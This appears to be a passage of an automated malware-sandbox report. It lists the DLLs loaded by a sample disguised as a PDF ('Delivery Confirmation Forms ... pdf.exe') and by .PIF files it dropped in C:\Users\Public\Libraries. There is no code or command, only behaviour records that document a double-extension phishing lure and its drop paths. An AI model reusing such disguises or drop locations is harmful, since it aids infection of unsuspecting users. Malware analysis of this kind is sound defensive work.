                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: olepro32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: url.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: olepro32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: url.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection loaded: msasn1.dllJump to behavior
